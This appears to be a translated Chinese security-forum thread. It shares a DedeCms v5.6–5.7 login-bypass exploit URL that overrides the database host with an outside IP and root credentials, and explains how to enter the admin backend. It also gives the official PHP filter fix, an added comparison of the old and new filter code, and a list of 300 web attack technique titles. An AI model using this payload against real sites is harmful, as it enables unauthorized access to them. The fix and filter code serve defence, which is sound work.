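Forum content and invalid IDs will be cleaned up

Because the forum has been poorly managed recently, and on top of that there has been all kinds of censorship pressure, the atmosphere for discussion is not what it used to be. So a cleanup is necessary. We hope everyone understands!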

 


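非安全中国网 disclaimer:
1. All statements and images in this post are solely the personal opinion of the poster and do not represent the position of this site;
2. This topic was posted by 無情; the poster 無情 complies with the six management rules of the "Copyright and Disclaimer Statement" and enjoys the related rights;
3. Other organizations or individuals must obtain the consent of the poster 無情 and of this site before using, reposting or quoting this post;
4. Parts of this post are reposted from other media and published on this site; the purpose of reposting is to convey more information and does not mean that this site agrees with its views or is responsible for its authenticity;
5. If this post infringes the copyright of your site or of an individual, please notify this site immediately; this site will delete it promptly and offers its deepest apologies;
6. The administrators and moderators of this site have the right to delete this post without notifying the poster in advance.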

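Should have been done long ago.

Notice: the author has been banned or deleted; the content is automatically hidden.

/picks nose  Uncle, you are not allowed to clear out my little sock-puppet account...
Hmph, I'm so not an insider~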

DedeCms v5.6-5.7 unauthorized access vulnerability
http://www.XXXX.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current CAPTCHA code and you go straight into the site's admin backend.

This vulnerability can only be exploited if the admin backend path is known.

Official temporary fix:

Find the file include/common.inc.php and replace:
    foreach($_REQUEST as $_k=>$_v)
    {
        var_dump($_k);
        if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
        {
            exit('Request var not allow!');
        }
    }

with:

    // Check and register externally submitted variables
    function CheckRequest(&$val) {
        if (is_array($val)) {
            foreach ($val as $_k=>$_v) {
                CheckRequest($_k);
                CheckRequest($val[$_k]);
            }
        } else
        {
            if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
            {
                exit('Request var not allow!');
            }
        }
    }
    CheckRequest($_REQUEST);

Announcement: https://www.sitedirsec.com publishes the latest vulnerabilities; please follow it.
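
The difference between the two checks in the post above, as an added example that is not part of the original post or of DedeCms: the old loop looks only at top-level request keys, while the replacement walks nested keys and values. The function names, the boolean return values (used in place of exit()) and the sample requests are assumptions constructed for illustration.

```php
<?php
// Added example (not DedeCms code): the two checks from the post, rewritten to
// return true when a request must be rejected instead of calling exit(), so
// both can be run against the same constructed input.

const FORBIDDEN_PREFIX = '#^(cfg_|GLOBALS)#';

// Original check: only the top-level keys of the request are inspected.
function flatCheck(array $request): bool
{
    foreach ($request as $k => $v) {
        $k = (string)$k;
        if (strlen($k) > 0 && preg_match(FORBIDDEN_PREFIX, $k)) {
            return true;
        }
    }
    return false;
}

// Replacement check: walks every nested key and every scalar value.
function recursiveCheck($val): bool
{
    if (is_array($val)) {
        foreach ($val as $k => $v) {
            if (recursiveCheck($k) || recursiveCheck($v)) {
                return true;
            }
        }
        return false;
    }
    $s = (string)$val;
    return strlen($s) > 0 && preg_match(FORBIDDEN_PREFIX, $s) === 1;
}

// Constructed sample requests, shaped like PHP's parsed $_REQUEST array.
$samples = [
    'ordinary login form'      => ['dopost' => 'login', 'userid' => 'editor'],
    'top-level cfg_ key'       => ['cfg_dbhost' => 'db.example.invalid'],
    'nested GLOBALS key'       => ['_POST' => ['GLOBALS' => ['cfg_dbhost' => 'db.example.invalid']]],
    'value starting with cfg_' => ['keyword' => 'cfg_basehost setting'],
];

foreach ($samples as $label => $request) {
    printf(
        "%-26s flat=%-7s recursive=%s\n",
        $label,
        flatCheck($request) ? 'reject' : 'pass',
        recursiveCheck($request) ? 'reject' : 'pass'
    );
}
```

The nested GLOBALS row is the case the original loop lets through. The last row shows a side effect of the replacement: an ordinary value that merely begins with cfg_ or GLOBALS is rejected as well.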


(2006-2009) Summary of 300 attack techniques
(2006:1-65 | 2007:66-148 | 2008:149-218 | 2009:219-300) 300 ideas, 300 ways of thinking flexibly. Some of the articles can only be read from outside the firewall.
1.The Attack of the TINY URLs
2.Backdooring MP3 Files
3.Backdooring QuickTime Movies
4.CSS history hacking with evil marketing
5.I know where you've been
6.Stealing Search Engine Queries with JavaScript
7.Hacking RSS Feeds
8.MX Injection : Capturing and Exploiting Hidden Mail Servers
9.Blind web server fingerprinting
10.JavaScript Port Scanning
11.CSRF with MS Word
12.Backdooring PDF Files
13.Exponential XSS Attacks
14.Malformed URL in Image Tag Fingerprints Internet Explorer
15.JavaScript Portscanning and bypassing HTTP Auth
16.Bruteforcing HTTP Auth in Firefox with JavaScript
17.Bypassing Mozilla Port Blocking
18.How to defeat digg.com
19.A story that diggs itself
20.Expect Header Injection Via Flash
21.Forging HTTP request headers with Flash
22.Cross Domain Leakage With Image Size
23.Enumerating Through User Accounts
24.Widespread XSS for Google Search Appliance
25.Detecting States of Authentication With Protected Images
26.XSS Fragmentation Attacks
27.Poking new holes with Flash Crossdomain Policy Files
28.Google Indexes XSS
29.XML Intranet Port Scanning
30.IMAP Vulnerable to XSS
31.Detecting Privoxy Users and Circumventing It
32.Using CSS to De-Anonymize
33.Response Splitting Filter Evasion
34.CSS History Stealing Acts As Cookie
35.Detecting FireFox Extentions
36.Stealing User Information Via Automatic Form Filling
37.Circumventing DNS Pinning for XSS
38.Netflix.com XSRF vuln
39.Browser Port Scanning without JavaScript
40.Widespread XSS for Google Search Appliance
41.Bypassing Filters With Encoding
42.Variable Width Encoding
43.Network Scanning with HTTP without JavaScript
44.AT&T Hack Highlights Web Site Vulnerabilities
45.How to get linked from Slashdot
46.F5 and Acunetix XSS disclosure
47.Anti-DNS Pinning and Circumventing Anti-Anti DNS pinning
48.Google plugs phishing hole
49.Nikon magazine hit with security breach
50.Governator Hack
51.Metaverse breached: Second Life customer database hacked
52.HostGator: cPanel Security Hole Exploited in Mass Hack
53.Firefox Extensions
54.ABC News (AU) XSS linking the reporter to Al Qaeda
55.Account Hijackings Force LiveJournal Changes
56.Xanga Hit By Script Worm
57.Advanced Web Attack Techniques using GMail
58.PayPal Security Flaw allows Identity Theft
59.Internet Explorer 7 "mhtml:" Redirection Information Disclosure
60.Bypassing of web filters by using ASCII
61.Selecting Encoding Methods For XSS Filter Evasion
62.Adultspace XSS Worm
63.Anonymizing RFI Attacks Through Google
64.Google Hacks On Your Behalf
65.Google Dorks Strike Again
66.Cross-Site Printing
67.Stealing Pictures with Picasa
68.HScan Redux
69.ISO-8895-1 Vulnerable in Firefox to Null Injection
70.MITM attack to overwrite addons in Firefox
71.Microsoft ASP.NET Request Validation Bypass Vulnerability
72.Non-Alpha-Non-Digit 3
73.Steal History without JavaScript
74.Pure Java™, Pure Evil™ Popups
75.Google Adsense CSRF hole
76.There’s an OAK TREE in my blog!?!?!
77.BK for Mayor of Oak Tree View
78.Google Docs puts Google Users at Risk
79.All Your Google Docs are Belong To US…
80.Java Applets and DNS Rebinding
81.Scanning internal Lan with PHP remote file opening.
82.Firefox File Handling Woes
83.Firefoxurl URI Handler Flaw
84.Bugs in the Browser: Firefox’s DATA URL Scheme Vulnerability
85.Multiviews Apache, Accept Requests and free listing
86.Optimizing the number of requests in blind SQL injection
87.Bursting Performances in Blind SQL Injection - Take 2
88.Port Scan without JavaScript
89.Favorites Gone Wild
90.Cross-Browser Proxy Unmasking
91.Spoofing Firefox protected objects
92.Injecting the script tag into XML
93.Login Detection without JavaScript
94.Anti-DNS Pinning ( DNS Rebinding ) : Online Demonstration
95.Username Enumeration Timing Attacks
96.Google GMail E-mail Hijack Technique
97.Recursive Request DoS
98.Exaggerating Timing Attack Results Via GET Flooding
99.Initiating Probes Against Servers Via Other Servers
100.Effects of DNS Rebinding On IE’s Trust Zones
101.Paper on Hacking Intranets Using Websites
102.More Port Scanning - This Time in Flash
103.HTTP Response Splitting and Data: URI scheme in Firefox
104.Res:// Protocol Local File Enumeration
105.Res Timing Attack
106.IE6.0 Protocol Guessing
107.IE 7 and Firefox Browsers Digest Authentication Request Splitting
108.Hacking Intranets Via Brute Force
109.Hiding JS in Valid Images
110.Internet Archiver Port Scanner
111.Noisy Decloaking Methods
112.Code Execution Through Filenames in Uploads
113.Cross Domain Basic Auth Phishing Tactics
114.Additional Image Bypass on Windows
115.Detecting users via Authenticated Redirects
116.Passing Malicious PHP Through getimagesize()
117.Turn Any Page Into A Greasemonkey Popup
118.Enumerate Windows Users In JS
119.Anti-DNS Pinning ( DNS Rebinding ) + Socket in FLASH
120.Iframe HTTP Ping
121.Read Firefox Settings (PoC)
122.Stealing Mouse Clicks for Banner Fraud
123.(Non-Persistent) Untraceable XSS Attacks
124.Inter Protocol Exploitation
125.Detecting Default Browser in IE
126.Bypass port blocking in Firefox, Opera and Konqueror.
127.LocalRodeo Detection
128.Image Names Gone Bad
129.IE Sends Local Addresses in Referer Header
130.PDF XSS Can Compromise Your Machine
131.Universal XSS in Adobe’s Acrobat Reader Plugin
132.Firefox Popup Blocker Allows Reading Arbitrary Local Files
133.IE7.0 Detector
134.overwriting cookies on other people’s domains in Firefox.
135.Embeding SVG That Contains XSS Using Base64 Encoding in Firefox
136.Firefox Header Redirection JavaScript Execution
137.More URI Stuff…
138.Hacking without 0days: Drive-by Java
139.Google Urchin password theft madness
140.Username Enumeration Vulnerabilities
141.Client-side SQL Injection Attacks
142.Content-Disposition Hacking
143.Flash Cookie Object Tracking
144.Java JAR Attacks and Features
145.Severe XSS in Google and Others due to the JAR protocol issues
146.Web Mayhem: Firefox’s JAR: Protocol issues
147.0DAY: QuickTime pwns Firefox
148.Exploiting Second Life
149.CUPS Detection
150.CSRFing the uTorrent plugin
151.Clickjacking / Videojacking
152.Bypassing URL Authentication and Authorization with HTTP Verb Tampering
153.I used to know what you watched, on YouTube (CSRF + Crossdomain.xml)
154.Safari Carpet Bomb
155.Flash clipboard Hijack
156.Flash Internet Explorer security model bug
157.Frame Injection Fun
158.Free MacWorld Platinum Pass? Yes in 2008!
159.Diminutive Worm, 161 byte Web Worm
160.SNMP XSS Attack (1)
161.Res Timing File Enumeration Without JavaScript in IE7.0
162.Stealing Basic Auth with Persistent XSS
163.Smuggling SMTP through open HTTP proxies
164.Collecting Lots of Free 'Micro-Deposits'
165.Using your browser URL history to estimate gender
166.Cross-site File Upload Attacks
167.Same Origin Bypassing Using Image Dimensions
168.HTTP Proxies Bypass Firewalls
169.Join a Religion Via CSRF
170.Cross-domain leaks of site logins via Authenticated CSS
171.JavaScript Global Namespace Pollution
172.GIFAR
173.HTML/CSS Injections - Primitive Malicious Code
174.Hacking Intranets Through Web Interfaces
175.Cookie Path Traversal
176.Racing to downgrade users to cookie-less authentication
177.MySQL and SQL Column Truncation Vulnerabilities
178.Building Subversive File Sharing With Client Side Applications
179.Firefox XML injection into parse of remote XML
180.Firefox cross-domain information theft
181.Firefox 2 and WebKit nightly cross-domain image theft
182.Browser's Ghost Busters
183.Exploiting XSS vulnerabilities on cookies
184.Breaking Google Gears' Cross-Origin Communication Model
185.Flash Parameter Injection
186.Cross Environment Hopping
187.Exploiting Logged Out XSS Vulnerabilities
188.Exploiting CSRF Protected XSS
189.ActiveX Repurposing, (1, 2)
190.Tunneling tcp over http over sql-injection
191.Arbitrary TCP over uploaded pages
192.Local DoS on CUPS to a remote exploit via specially-crafted webpage (1)
193.JavaScript Code Flow Manipulation
194.Common localhost dns misconfiguration can lead to "same site" scripting
195.Pulling system32 out over blind SQL Injection
196.Dialog Spoofing - Firefox Basic Authentication
197.Skype cross-zone scripting vulnerability
198.Safari pwns Internet Explorer
199.IE "Print Table of Links" Cross-Zone Scripting Vulnerability
200.A different Opera
201.Abusing HTML 5 Structured Client-side Storage
202.SSID Script Injection
203.DHCP Script Injection
204.File Download Injection
205.Navigation Hijacking (Frame/Tab Injection Attacks)
206.UPnP Hacking via Flash
207.Total surveillance made easy with VoIP phone
208.Social Networks Evil Twin Attacks
209.Recursive File Include DoS
210.Multi-pass filters bypass
211.Session Extending
212.Code Execution via XSS (1)
213.Redirector’s hell
214.Persistent SQL Injection
215.JSON Hijacking with UTF-7
216.SQL Smuggling
217.Abusing PHP Sockets (1, 2)
218.CSRF on Novell GroupWise WebAccess
219.Persistent Cookies and DNS Rebinding Redux
220.iPhone SSL Warning and Safari Phishing
221.RFC 1918 Blues
222.Slowloris HTTP DoS
223.CSRF And Ignoring Basic/Digest Auth
224.Hash Information Disclosure Via Collisions - The Hard Way
225.Socket Capable Browser Plugins Result In Transparent Proxy Abuse
226.XMLHTTPReqest “Ping” Sweeping in Firefox 3.5+
227.Session Fixation Via DNS Rebinding
228.Quicky Firefox DoS
229.DNS Rebinding for Credential Brute Force
230.SMBEnum
231.DNS Rebinding for Scraping and Spamming
232.SMB Decloaking
233.De-cloaking in IE7.0 Via Windows Variables
234.itms Decloaking
235.Flash Origin Policy Issues
236.Cross-subdomain Cookie Attacks
237.HTTP Parameter Pollution (HPP)
238.How to use Google Analytics to DoS a client from some website.
239.Our Favorite XSS Filters and how to Attack them
240.Location based XSS attacks
241.PHPIDS bypass
242.I know what your friends did last summer
243.Detecting IE in 12 bytes
244.Detecting browsers javascript hacks
245.Inline UTF-7 E4X javascript hijacking
246.HTML5 XSS
247.Opera XSS vectors
248.New PHPIDS vector
249.Bypassing CSP for fun, no profit
250.Twitter misidentifying context
251.Ping pong obfuscation
252.HTML5 new XSS vectors
253.About CSS Attacks
254.Web pages Detecting Virtualized Browsers and other tricks
255.Results, Unicode Left/Right Pointing Double Angel Quotation Mark
256.Detecting Private Browsing Mode
257.Cross-domain search timing
258.Bonus Safari XXE (only affecting Safari 4 Beta)
259.Apple's Safari 4 also fixes cross-domain XML theft
260.Apple's Safari 4 fixes local file theft attack
261.A more plausible E4X attack
262.A brief description of how to become a CA
263.Creating a rogue CA certificate
264.Browser scheme/slash quirks
265.Cross-protocol XSS with non-standard service ports
266.Forget sidejacking, clickjacking, and carjacking: enter “Formjacking”
267.MD5 extension attack
268.Attack - PDF Silent HTTP Form Repurposing Attacks
269.XSS Relocation Attacks through Word Hyperlinking
270.Hacking CSRF Tokens using CSS History Hack
271.Hijacking Opera’s Native Page using malicious RSS payloads
272.Millions of PDF invisibly embedded with your internal disk paths
273.Exploiting IE8 UTF-7 XSS Vulnerability using Local Redirection
274.Pwning Opera Unite with Inferno’s Eleven
275.Using Blended Browser Threats involving Chrome to steal files on your computer
276.Bypassing OWASP ESAPI XSS Protection inside Javascript
277.Hijacking Safari 4 Top Sites with Phish Bombs
278.Yahoo Babelfish - Possible Frame Injection Attack - Design Stringency
279.Gmail - Google Docs Cookie Hijacking through PDF Repurposing & PDF
280.IE8 Link Spoofing - Broken Status Bar Integrity
281.Blind SQL Injection: Inference thourgh Underflow exception
282.Exploiting Unexploitable XSS
283.Clickjacking & OAuth
284.Google Translate - Google User Content - File Uploading Cross - XSS and Design Stringency - A Talk
285.Active Man in the Middle Attacks
286.Cross-Site Identification (XSid)
287.Microsoft IIS with Metasploit evil.asp;.jpg
288.MSWord Scripting Object XSS Payload Execution Bug and Random CLSID Stringency
289.Generic cross-browser cross-domain theft
290.Popup & Focus URL Hijacking
291.Advanced SQL injection to operating system full control (whitepaper)
292.Expanding the control over the operating system from the database
293.HTML+TIME XSS attacks
294.Enumerating logins via Abuse of Functionality vulnerabilities
295.Hellfire for redirectors
296.DoS attacks via Abuse of Functionality vulnerabilities
297.URL Spoofing vulnerability in bots of search engines (#2)
298.URL Hiding - new method of URL Spoofing attacks
299.Exploiting Facebook Application XSS Holes to Make API Requests
300.Unauthorized TinyURL URL Enumeration Vulnerability